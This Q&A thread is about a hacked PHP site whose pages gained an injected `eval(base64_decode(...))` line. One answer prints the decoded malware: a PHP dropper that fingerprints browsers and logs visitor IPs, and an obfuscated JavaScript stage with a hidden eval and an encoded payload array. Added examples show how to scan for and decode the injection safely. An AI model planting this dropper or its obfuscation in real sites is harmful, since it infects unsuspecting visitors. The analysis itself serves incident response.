Can <script type="text/javascript">window.location="/";</script> be hacked?

Time: 2012-09-12 15:56:20

Tags: php javascript security base64 eval

My PHP files, especially the index.php files that carry a JavaScript redirect such as:

<script type="text/javascript">window.location="/";</script>

got hacked into this:

<?php eval(base64_decode('[long base64 payload omitted]'));?>
<script type="text/javascript">window.location="/";</script>

Is it because I use $_SERVER["REQUEST_URI"], $_SERVER["HTTP_REFERER"] or other commands? Do they need to be stripped the way mysql_real_escape_string does it?

3 answers:

Answer 0 (score: 2)

The problem is that your PHP code itself was hacked. You can try base64-decoding all of that text to see what it is doing, but someone or something had permission to modify your PHP file. The JavaScript has nothing to do with it.

If you are running something like WordPress, you can look at what they recommend. But first, you need to change all of your passwords. Then look at how someone was able to modify your code. And make sure your files are not writable (e.g. try 755 instead of 777).
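A way to do the "decode it and see what it is doing" step without ever executing the blob, as an added Node.js example that is not part of the original answer: it finds every eval(base64_decode('...')) in a PHP source string, decodes the inner text, and flags the first-stage indicators visible in this page's decoded dropper. The sample PHP and the indicator list are constructed from what the page shows, nothing more.

```javascript
// Added example (not from the question or answers): scan PHP source for
// the exact injection pattern that hit the asker's index.php,
// `<?php eval(base64_decode('...'));?>`, and decode it safely.
const EVAL_B64 = /eval\s*\(\s*base64_decode\s*\(\s*['"]([A-Za-z0-9+\/=\r\n]+)['"]\s*\)\s*\)/gi;

// Substrings taken from the first-stage decode shown in answer 1:
// user-agent sniffing, error suppression, the md5-named per-IP file.
const INDICATORS = [
  "$_SERVER['HTTP_USER_AGENT']",
  "error_reporting(0)",
  "md5($dr",
  "fopen(",
];

// Returns one finding per eval/base64 match: where it sits, the decoded
// stage, and which indicators it contains.  Nothing is ever evaluated.
function scanPhpSource(src) {
  const findings = [];
  for (const m of src.matchAll(EVAL_B64)) {
    const decoded = Buffer.from(m[1].replace(/\s+/g, ""), "base64").toString("latin1");
    const hits = INDICATORS.filter((s) => decoded.includes(s));
    findings.push({ offset: m.index, decoded, hits });
  }
  return findings;
}

// Constructed sample: a clean redirect page with an injected line in
// front of it.  STAGE1 is a shortened stand-in for the real dropper and
// is base64-encoded here so the sample matches what a scanner would see.
const STAGE1 =
  "$ua=$_SERVER['HTTP_USER_AGENT'];$dbf=$dr.'/'.md5($dr.'1');" +
  "error_reporting(0);if($fp=@fopen($dbf,'a')){fclose($fp);}";
const SAMPLE_PHP =
  "<?php eval(base64_decode('" + Buffer.from(STAGE1, "latin1").toString("base64") + "'));?>\n" +
  '<script type="text/javascript">window.location="/";</script>\n';
const CLEAN_PHP = '<script type="text/javascript">window.location="/";</script>\n';

for (const f of scanPhpSource(SAMPLE_PHP)) {
  console.log(`eval(base64_decode) at offset ${f.offset}; indicators: ${f.hits.join(", ")}`);
  console.log(f.decoded);
}
```

Run it over every .php file under the document root; a clean file such as CLEAN_PHP produces no findings at all.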

Answer 1 (score: 1)

There seems to be an HTML (PHP) block in your page. Possibly the result of XSS?

The first-stage decode shows:

$ip=$_SERVER["REMOTE_ADDR"];$dr=$_SERVER["DOCUMENT_ROOT"];$ua = $_SERVER['HTTP_USER_AGENT'];$dbf=$dr.'/'.md5($dr.'1');
if((strpos($ua,'Windows')!==false)&&((strpos($ua,'MSIE')!==false)||(strpos($ua,'Firefox')!==false))&&(strpos(@file_get_contents($dbf),$ip) === false)){
    error_reporting(0);
    echo(base64_decode('...')); // second-stage base64 omitted here; decoded below
    if ($fp = @fopen($dbf , "a")){fputs($fp , $ip.'|'); fclose($fp);}
}

The second-stage decode shows:

try {
    abre++
} catch (a6ba34y) {
    try {
        prototype & 2
    } catch (asab) {
        e = window["e" + "v" + "al"];
    }
}
if (1) {
    f = [-4, - 5, 90, 89, 18, 25, 87, 97, 84, 104, 95, 86, 97, 102, 31, 90, 87, 101, 56, 94, 86, 96, 87, 95, 103, 101, 51, 108, 70, 82, 90, 64, 82, 96, 87, 25, 26, 84, 96, 87, 107, 24, 28, 77, 33, 80, 27, 108, 0, - 5, - 6, - 4, 91, 87, 101, 83, 94, 88, 100, 25, 28, 45, - 2, - 4, - 5, 110, 19, 87, 93, 102, 87, 17, 110, - 1, - 6, - 4, - 5, 85, 98, 85, 102, 96, 87, 95, 103, 32, 104, 101, 91, 101, 88, 26, 19, 47, 91, 87, 101, 83, 94, 88, 18, 100, 101, 85, 46, 26, 90, 101, 103, 98, 43, 34, 33, 102, 92, 107, 107, 94, 92, 99, 33, 87, 107, 104, 83, 31, 86, 97, 94, 34, 104, 84, 33, 98, 89, 99, 49, 88, 98, 47, 35, 26, 18, 104, 92, 86, 101, 91, 47, 24, 36, 34, 24, 19, 90, 86, 92, 89, 89, 103, 47, 24, 36, 34, 24, 19, 101, 101, 108, 94, 86, 48, 25, 103, 92, 101, 90, 85, 91, 93, 92, 102, 106, 45, 90, 90, 87, 86, 86, 97, 45, 97, 98, 101, 90, 103, 91, 96, 97, 44, 82, 85, 101, 96, 95, 103, 101, 88, 45, 93, 88, 88, 101, 45, 34, 44, 103, 97, 97, 45, 34, 44, 26, 48, 45, 34, 91, 87, 101, 83, 94, 88, 48, 19, 28, 45, - 2, - 4, - 5, 110, 0, - 5, - 6, 89, 103, 95, 86, 102, 90, 98, 96, 17, 92, 88, 99, 84, 95, 86, 101, 26, 26, 110, - 1, - 6, - 4, - 5, 103, 84, 100, 17, 89, 18, 46, 19, 86, 96, 86, 103, 94, 88, 96, 101, 33, 85, 99, 88, 83, 101, 88, 55, 93, 88, 95, 86, 97, 102, 25, 26, 91, 87, 101, 83, 94, 88, 25, 26, 46, 88, 31, 102, 87, 101, 52, 102, 101, 101, 91, 83, 104, 102, 86, 27, 25, 100, 101, 85, 24, 31, 25, 89, 103, 102, 97, 45, 33, 32, 104, 91, 106, 109, 93, 91, 101, 32, 86, 109, 103, 82, 33, 85, 96, 96, 33, 103, 86, 32, 97, 91, 98, 48, 90, 97, 46, 37, 25, 26, 46, 88, 31, 102, 102, 106, 95, 87, 31, 105, 91, 100, 92, 84, 90, 95, 91, 101, 108, 47, 24, 91, 91, 85, 87, 87, 95, 26, 45, 87, 33, 101, 101, 108, 94, 86, 33, 98, 96, 102, 91, 101, 92, 97, 95, 48, 25, 82, 85, 101, 96, 95, 103, 101, 88, 25, 44, 89, 32, 100, 103, 107, 93, 88, 32, 93, 88, 88, 101, 48, 25, 33, 26, 45, 87, 33, 101, 101, 108, 94, 86, 33, 102, 96, 99, 47, 24, 35, 25, 44, 89, 32, 100, 88, 102, 50, 103, 102, 99, 92, 84, 
102, 103, 87, 25, 26, 105, 90, 87, 102, 89, 26, 30, 24, 36, 34, 24, 28, 45, 87, 33, 101, 86, 103, 51, 101, 103, 100, 90, 85, 103, 101, 88, 26, 24, 91, 87, 90, 90, 90, 101, 26, 30, 24, 36, 34, 24, 28, 45, - 2, - 4, - 5, - 6, 87, 97, 84, 104, 95, 86, 97, 102, 31, 90, 87, 101, 56, 94, 86, 96, 87, 95, 103, 101, 51, 108, 70, 82, 90, 64, 82, 96, 87, 25, 26, 84, 96, 87, 107, 24, 28, 77, 33, 80, 32, 82, 99, 98, 86, 97, 86, 52, 91, 91, 93, 87, 26, 87, 28, 45, - 2, - 4, - 5, 110];
}
w = f;
s = [];
r = String;
x = "j%";
for (i = 0; - i + 579 != 0; i += 1) {
    j = i;
    if (e && (031 == 0x19)) s = s + r.fromCharCode((1 * w[j] + e(x + 3) + 13));
}
try {
    asgasg & 13
} catch (asga) {
    e(s);
}

The further payload is then obfuscated with the JavaScript Packer. For those interested in seeing what this does, I will play around with it later this afternoon...
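The loop in that second stage builds its string as fromCharCode(w[j] + e(x + 3) + 13), where e is eval and x + 3 is the string "j%3", so each byte is simply w[j] + (j % 3) + 13. As an added example that is not part of the original answer, the function below reproduces that arithmetic directly so the next stage can be read without handing anything to eval; encodeStage3 is my own inverse for building test input, and PAGE_PREFIX is the first 36 entries of the array f copied from the answer.

```javascript
// Added example (not from the original answer): decode the page's
// second-stage array without eval.  The original computes
//   s += String.fromCharCode(1 * w[j] + e("j%3") + 13)
// with e = window["e" + "v" + "al"] and j the loop index, i.e. the
// offset per byte is (j % 3) + 13.  The `031 == 0x19` check is 25 == 25,
// an octal literal that only exists to make the stage die in strict mode.
function decodeStage3(w) {
  let s = "";
  for (let j = 0; j < w.length; j += 1) {
    s += String.fromCharCode(w[j] + (j % 3) + 13);
  }
  return s;
}

// Inverse of decodeStage3, constructed here only to produce test input;
// the packer that generated the page's array is not known.
function encodeStage3(text) {
  const w = [];
  for (let j = 0; j < text.length; j += 1) {
    w.push(text.charCodeAt(j) - (j % 3) - 13);
  }
  return w;
}

// First 36 entries of `f` from the answer above, copied verbatim.  The
// negative values become tab characters once the offset is added back.
const PAGE_PREFIX = [-4, -5, 90, 89, 18, 25, 87, 97, 84, 104, 95, 86, 97, 102,
  31, 90, 87, 101, 56, 94, 86, 96, 87, 95, 103, 101, 51, 108, 70, 82, 90, 64,
  82, 96, 87, 25];

console.log(JSON.stringify(decodeStage3(PAGE_PREFIX)));
```

Feeding the full 579-entry array from the answer to decodeStage3 yields the third stage as plain text, which can then be read or scanned like any other script.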

Answer 2 (score: -1)

If you are using PHP, just use a header redirect; then you do not have to worry about JavaScript vulnerabilities:

header('Location: http://www.example.com/');

This has to happen before anything is output to the DOM. If SEO is a factor, you might also consider using an .htaccess redirect.